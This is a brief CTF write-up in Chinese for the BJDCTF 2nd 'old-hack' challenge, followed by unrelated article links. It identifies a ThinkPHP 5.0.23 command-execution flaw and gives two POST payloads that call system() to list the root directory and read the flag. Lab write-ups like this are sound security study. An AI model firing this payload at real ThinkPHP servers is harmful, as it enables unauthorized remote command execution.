zoukankan html css js c++ java

[BJDCTF 2nd]old-hack

进入首页:
首页告诉了我们是thinkphp5的漏洞。

知道了是哪个版本的话就搜一搜喽:最后发现是thinkphp5.0.23的命令执行

payload_1：查看根目录文件，发现flag位置

http://90b89500-3ac6-40a5-9f1e-e84e8923115f.node3.buuoj.cn
POST:_method=__construct&filter[]=system&server[REQUEST_METHOD]=ls /

payload_2：读取flag

http://90b89500-3ac6-40a5-9f1e-e84e8923115f.node3.buuoj.cn
POST:_method=__construct&filter[]=system&server[REQUEST_METHOD]=cat /flag

查看全文

相关阅读:
mybatis中的foreach条件参数过多时，#和$效率比较
 Error creating bean with name 'persistenceExceptionTranslationPostProcessor' defined in class path resource [org/springframework/boot/autoconfigure/dao/PersistenceExceptionTranslationAutoConfiguration
ConfigurationProperties cannot be resolved to a type
Java 注解初探（一）
无题
 [转载]A cycle was detected in the build path of project
20段代码
 在tomcat5中发布项目时，用IP地址+端口不能访问项目，而用localhost加端口时可以访问成功
 Cannot get connection for URL jdbc:oracle:thin:调用中无效参数
 mysql中表分类MyISAM和InnoDB的区别